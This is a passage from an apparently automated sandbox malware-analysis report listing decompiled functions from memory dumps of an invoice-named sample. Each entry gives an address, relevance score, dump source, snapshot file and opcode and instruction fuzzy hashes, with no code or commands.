                                                                                                                                  • Opcode Fuzzy Hash: dd2e5537a49d2d5a53f73bcc7f6c1b7d7db88cffc8f53c79ecbc6bf11e30dea9
                                                                                                                                  • Instruction Fuzzy Hash: 91D18D78E002188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB355DB315D82DF51
                                                                                                                                  Function 3917BC38 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 713c93553970a490d86de0533423b33020dde685fcb27c257fc45d8592c7c95c
                                                                                                                                  • Instruction ID: 62cb7eb54b0787bc1da0921b286b9cdbaf2e618d84965506bd0ef70a5c57b464
                                                                                                                                  • Opcode Fuzzy Hash: 713c93553970a490d86de0533423b33020dde685fcb27c257fc45d8592c7c95c
                                                                                                                                  • Instruction Fuzzy Hash: BCD19D78E003188FEB54DFA9C980B9DBBB2AF89300F1081A9D909BB355DB315D82DF51
                                                                                                                                  Function 3917DC28 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 035a088b95266450008e638f0d3e9928e141c05b114e5a5ba72902c248646d53
                                                                                                                                  • Instruction ID: 30869572f06ede82da9e46145383e6484a833c205957307bfd9711ac97b1fcb9
                                                                                                                                  • Opcode Fuzzy Hash: 035a088b95266450008e638f0d3e9928e141c05b114e5a5ba72902c248646d53
                                                                                                                                  • Instruction Fuzzy Hash: 99D19D78E003188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB355DB315982DF51
                                                                                                                                  Function 3917CE78 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b958a3c4fd742c5e8f9a5821f83596da524830e67e90a1e824e3f837ff7f976
                                                                                                                                  • Instruction ID: d93c3455f7e0fde9f32d1b387ea1caac066010bed738cc35186da6d49bc66125
                                                                                                                                  • Opcode Fuzzy Hash: 7b958a3c4fd742c5e8f9a5821f83596da524830e67e90a1e824e3f837ff7f976
                                                                                                                                  • Instruction Fuzzy Hash: EED19F78E002188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB354DB315D82DF51
                                                                                                                                  Function 3917EE68 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1f7165cbd07fc07b86f441d691868bccde0c5d7e304820dbe28f2abe6f8ee0f0
                                                                                                                                  • Instruction ID: 98e82fa3ac4a431f0f3c4efd1552ddeaabe3d6a2d0292c8af9f601eb161adfc4
                                                                                                                                  • Opcode Fuzzy Hash: 1f7165cbd07fc07b86f441d691868bccde0c5d7e304820dbe28f2abe6f8ee0f0
                                                                                                                                  • Instruction Fuzzy Hash: F3D19D78E002188FEB55DFA9C990B9DBBB2AF89300F5081A9D909BB354DB315982DF51
                                                                                                                                  Function 3917E0B8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f32612cea00b030e5a44ae45364dc669095af634cd4e53b41621f71677d86e3f
                                                                                                                                  • Instruction ID: a4ca4d4f8c4ee98a9eb9657c490e13a86ab7f5ee8a66157b77390efc18ef4723
                                                                                                                                  • Opcode Fuzzy Hash: f32612cea00b030e5a44ae45364dc669095af634cd4e53b41621f71677d86e3f
                                                                                                                                  • Instruction Fuzzy Hash: 47D19E78E003188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB365DB315D81DF51
                                                                                                                                  Function 3917C0C8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4899931b411090cc43f5c856670a79e3dc50a41cf2c31f22b78e8f50d4389ecc
                                                                                                                                  • Instruction ID: 47a64e61ac6f90ee5dfbe9d99e797ed8ace03acbf1ae44ccb030d9cf8ffc092b
                                                                                                                                  • Opcode Fuzzy Hash: 4899931b411090cc43f5c856670a79e3dc50a41cf2c31f22b78e8f50d4389ecc
                                                                                                                                  • Instruction Fuzzy Hash: 26D19D78E002188FEB55DFA9C990B9DBBB2AF89300F1081A9D909BB355DB315982DF51
                                                                                                                                  Function 3917F2F8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ce02b52f954f3ca069c370f9dc5f23b009198edf286169ba71da6310fcedcda7
                                                                                                                                  • Instruction ID: 81e52ee328d7c7707e2e0c355d6777c82f021ac21b3cb5ddb095b5e9cb9aad07
                                                                                                                                  • Opcode Fuzzy Hash: ce02b52f954f3ca069c370f9dc5f23b009198edf286169ba71da6310fcedcda7
                                                                                                                                  • Instruction Fuzzy Hash: 4AD18D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB355DB315D82DF51
                                                                                                                                  Function 391E2918 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cb81e7875413c2e2c0e998c8de7e13b327e38ce79f82e65deaf35b8fd77707d8
                                                                                                                                  • Instruction ID: 977ef6900a1238bb2f122b85f4f441b9c18767ad57280c5c5f00b3cddf55e215
                                                                                                                                  • Opcode Fuzzy Hash: cb81e7875413c2e2c0e998c8de7e13b327e38ce79f82e65deaf35b8fd77707d8
                                                                                                                                  • Instruction Fuzzy Hash: 6DD19D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB354DB315D82DF51
                                                                                                                                  Function 391E1710 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 733cd802c61e71d2ec004c1d1a6ade487f9f6eef8e46afd0d06077fa3cfb624f
                                                                                                                                  • Instruction ID: 1eb702e847777bb8e943ac2fb8b6752e9348c1059b537f5c377248ac76d9ac77
                                                                                                                                  • Opcode Fuzzy Hash: 733cd802c61e71d2ec004c1d1a6ade487f9f6eef8e46afd0d06077fa3cfb624f
                                                                                                                                  • Instruction Fuzzy Hash: E0D19D78E002188FEB55DFA9C990B9DBBB2BF89300F5081A9D909BB354DB315D82DF51
                                                                                                                                  Function 391E4908 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 43a17aaff92d8c0705a7964979d80aff4872c75c3c60d3130685ac6dad1fd33b
                                                                                                                                  • Instruction ID: 4509ea4f29518092274deee0d757c7660c41eba0a6660ba50e652ee0a71f9b84
                                                                                                                                  • Opcode Fuzzy Hash: 43a17aaff92d8c0705a7964979d80aff4872c75c3c60d3130685ac6dad1fd33b
                                                                                                                                  • Instruction Fuzzy Hash: CCD19D78E002188FEB55DFA9C990B9DBBB2BF89300F1081A9D909BB354DB315D82DF51
                                                                                                                                  Function 391E3238 Relevance: .3, Instructions: 272COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 83e95097946ee8221ec8367a8f393b4d028382bfe28be3a53f09c2277edc314d
                                                                                                                                  • Instruction ID: ea2e1f4cdc1c461ed4c53f3d4b66f31c63d8bdfaced17e7786b2fc143222a023
                                                                                                                                  • Opcode Fuzzy Hash: 83e95097946ee8221ec8367a8f393b4d028382bfe28be3a53f09c2277edc314d
                                                                                                                                  • Instruction Fuzzy Hash: 41D19E78E002188FEB55DFA9C950B9DBBB2BF89300F5081A9D809BB354DB315E82DF51
                                                                                                                                  Function 39172300 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fd52e2332387d661c8fb1506fa7514d0930dc5a3bed6dcebd47e199d691a6ac4
                                                                                                                                  • Instruction ID: 7be11244a4f81d17235f16d440d5779eee0671b0d63298741b316e68640a0dd5
                                                                                                                                  • Opcode Fuzzy Hash: fd52e2332387d661c8fb1506fa7514d0930dc5a3bed6dcebd47e199d691a6ac4
                                                                                                                                  • Instruction Fuzzy Hash: 4DC1B074E01218CFEB14DFA9C954B9DBBB2BF89304F5081A9D809AB355DB349E82CF51
                                                                                                                                  Function 39175328 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f842933c67ebabffcb24377d767e03a8d852ce9ee97d480ff0cd25baac8bc37e
                                                                                                                                  • Instruction ID: c6b1a5619be2dd0af337a3d90a0104801718281db01e8deb34907280934954dc
                                                                                                                                  • Opcode Fuzzy Hash: f842933c67ebabffcb24377d767e03a8d852ce9ee97d480ff0cd25baac8bc37e
                                                                                                                                  • Instruction Fuzzy Hash: F1C1A074E01218CFEB14DFA9C984B9DBBB2AF89304F5081A9D809AB355DB359E81CF51
                                                                                                                                  Function 39172758 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ed273bc03929a16aa806ed6156209e37b7aba7d529135953447d0dfc83435ff1
                                                                                                                                  • Instruction ID: 43dcbfab52a7e19b7bb6b51c4947321e5a87f0ed8a6e7d03b4ef5ebb15fce7f8
                                                                                                                                  • Opcode Fuzzy Hash: ed273bc03929a16aa806ed6156209e37b7aba7d529135953447d0dfc83435ff1
                                                                                                                                  • Instruction Fuzzy Hash: 95C1B074E01218CFDB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB359E86CF51
                                                                                                                                  Function 39170D48 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 701b64520b3f06b2f9631f9884b089fb3bf65738aaa715c70e0f4f0aae5035c6
                                                                                                                                  • Instruction ID: 9bb9098e8454ca66f6aa682fc972ca461113fb7368c7a07cd9f370024dabb3a9
                                                                                                                                  • Opcode Fuzzy Hash: 701b64520b3f06b2f9631f9884b089fb3bf65738aaa715c70e0f4f0aae5035c6
                                                                                                                                  • Instruction Fuzzy Hash: 9CC1AE74E01218CFEB54DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF51
                                                                                                                                  Function 39175780 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7182c8d2deafe15e8ce9c2a05f070eb91b42e6a64c758ebfbf9a3b084e3ea2ea
                                                                                                                                  • Instruction ID: ac5946c1180adfaeb257b5d2323eee91d965f775231c4139acd685adf94356a5
                                                                                                                                  • Opcode Fuzzy Hash: 7182c8d2deafe15e8ce9c2a05f070eb91b42e6a64c758ebfbf9a3b084e3ea2ea
                                                                                                                                  • Instruction Fuzzy Hash: 43C1BF74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF50
                                                                                                                                  Function 39172BB0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 81588b687ac7e9e45a96ea0eb092992e4da84e3d61150429f9d6ed3aeec3807d
                                                                                                                                  • Instruction ID: d3979ad6cead3083e1dafda6ad9bc00a72426acbe6d92e691e92eaa0cf88dee3
                                                                                                                                  • Opcode Fuzzy Hash: 81588b687ac7e9e45a96ea0eb092992e4da84e3d61150429f9d6ed3aeec3807d
                                                                                                                                  • Instruction Fuzzy Hash: 78C1BF74E00218CFEB14DFA9C944B9DBBB2AF89304F1081A9D809BB355DB349E82DF50
                                                                                                                                  Function 391711A0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 22d51762a738e7c7d903e2c8b2cf5309f75075d35b4adac5c7b5684a83613caa
                                                                                                                                  • Instruction ID: 0a97fb0af0af886e0f7009498e032d720e064ce93aa9981a5300c5fa16a25770
                                                                                                                                  • Opcode Fuzzy Hash: 22d51762a738e7c7d903e2c8b2cf5309f75075d35b4adac5c7b5684a83613caa
                                                                                                                                  • Instruction Fuzzy Hash: 39C1AE74E01218CFEB54DFA9C984B9DBBB2BF89304F1081A9D809AB355DB349E85CF51
                                                                                                                                  Function 39175BD8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a3c650c620a5e74ed9f6a1a8b0107ac3652e30f77f2691edb79b2eacee3e84d
                                                                                                                                  • Instruction ID: 46187e5c0e21895819c157806bdfd80f887cfe6b4b59044ac46b9bf6bad50075
                                                                                                                                  • Opcode Fuzzy Hash: 6a3c650c620a5e74ed9f6a1a8b0107ac3652e30f77f2691edb79b2eacee3e84d
                                                                                                                                  • Instruction Fuzzy Hash: 39C1BE74E01218CFEB14DFA9C984B9DBBB2BF89304F1081A9D809AB355DB349E81DF51
                                                                                                                                  Function 391715F8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a3b9bcc73e28ed47611cf99d13ae84bf89c266fbef30988f80dd2081bd917926
                                                                                                                                  • Instruction ID: 37ac6d600383224c9dfa74dced1bb21938bf3c63ea85921d1a2844fe993fc492
                                                                                                                                  • Opcode Fuzzy Hash: a3b9bcc73e28ed47611cf99d13ae84bf89c266fbef30988f80dd2081bd917926
                                                                                                                                  • Instruction Fuzzy Hash: 0AC1B074E01218CFEB54DFA9C944B9DBBB2BF89304F1081A9D809AB355DB349E85DF50
                                                                                                                                  Function 39176A18 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 88c0f62656d758b6493e2adeeab30c2804886c1d36ac8d3c6a573fb066c9fb32
                                                                                                                                  • Instruction ID: 21e1c44fc3ccb4e8d46470ac454af1ddea1d6d56628e9881cb1265d8b7c678af
                                                                                                                                  • Opcode Fuzzy Hash: 88c0f62656d758b6493e2adeeab30c2804886c1d36ac8d3c6a573fb066c9fb32
                                                                                                                                  • Instruction Fuzzy Hash: 96C1BE74E01218CFEB14DFA9C984B9DBBB2AF89304F1081A9D809BB355DB359E85CF51
                                                                                                                                  Function 39176030 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 185c4f10d98a358904731de85be7891ce5f3eebf266a7e1cc0726b86849ad6da
                                                                                                                                  • Instruction ID: 2ffbbe82ef1e6e4f2879931f32b62aa5516f2485d8278fe9392b8fac73f71039
                                                                                                                                  • Opcode Fuzzy Hash: 185c4f10d98a358904731de85be7891ce5f3eebf266a7e1cc0726b86849ad6da
                                                                                                                                  • Instruction Fuzzy Hash: F8C1BF74E00218CFEB14DFA9C944B9DBBB2BF89304F2081A9D809AB355DB349E81CF51
                                                                                                                                  Function 39174620 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c11dd761a6ba4881fa6b227a03e0107749bfa2694661c9bcafebfda8c1a2ef45
                                                                                                                                  • Instruction ID: 45feb30fca15866575cab78dfcbb8b237e9f94c7c14c668ede9c9964ad9a9380
                                                                                                                                  • Opcode Fuzzy Hash: c11dd761a6ba4881fa6b227a03e0107749bfa2694661c9bcafebfda8c1a2ef45
                                                                                                                                  • Instruction Fuzzy Hash: E5C1AF74E01218CFEB14DFA9C984B9DBBB2AF89304F1081A9D809AB355DB359E81DF51
                                                                                                                                  Function 39171A50 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bbb12cb614c483c453c0d20ebba4c33403f5f098cfae023a1eb0d2231e883428
                                                                                                                                  • Instruction ID: 7d21e1d02c9f3835c3ee45435f8144aae0dfdaec10c93d820c442dd25dc33d55
                                                                                                                                  • Opcode Fuzzy Hash: bbb12cb614c483c453c0d20ebba4c33403f5f098cfae023a1eb0d2231e883428
                                                                                                                                  • Instruction Fuzzy Hash: 01C1BF74E01218CFEB54DFA9C984B9DBBB2BF89304F1081A9D809AB355DB359E81CF50
                                                                                                                                  Function 39170040 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 63479de7b1d0314b7662ce36e4e3ab8a1ab9aea3c113e4ee6473319722343e83
                                                                                                                                  • Instruction ID: 34b218c3c0bb5240a62f6a87115149769e6c45446b5486c49526713353c5c924
                                                                                                                                  • Opcode Fuzzy Hash: 63479de7b1d0314b7662ce36e4e3ab8a1ab9aea3c113e4ee6473319722343e83
                                                                                                                                  • Instruction Fuzzy Hash: 42C1AF74E01218CFEB14DFA9C944B9DBBB2BF89304F2081A9D809AB355DB359E81CF51
                                                                                                                                  Function 39176E70 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cba16fd52fda2836509f7cdad465a35777d3af82978caa6a527139d61f09e106
                                                                                                                                  • Instruction ID: 28438f3b52613f842fb530369e6fecd4297539e492d4d7c07778ac403f2eb1a2
                                                                                                                                  • Opcode Fuzzy Hash: cba16fd52fda2836509f7cdad465a35777d3af82978caa6a527139d61f09e106
                                                                                                                                  • Instruction Fuzzy Hash: CAC1BF74E01218CFEB14DFA9C944B9DBBB2BF89304F1081A9D809AB365DB359E81CF51
                                                                                                                                  Function 39174A78 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0ea0b179450b9cc1e77064d65c3637c9c097fbe6b779a4fafcd139107760c89
                                                                                                                                  • Instruction ID: a13a6a91e74fcafe9bb2977e817622357334ba250acd4ad5919be4f1b422c94e
                                                                                                                                  • Opcode Fuzzy Hash: d0ea0b179450b9cc1e77064d65c3637c9c097fbe6b779a4fafcd139107760c89
                                                                                                                                  • Instruction Fuzzy Hash: 2FC1B078E01218CFEB14DFA9C944B9DBBB2BF89304F1081A9D809AB355DB349E81DF51
                                                                                                                                  Function 39173460 Relevance: .3, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
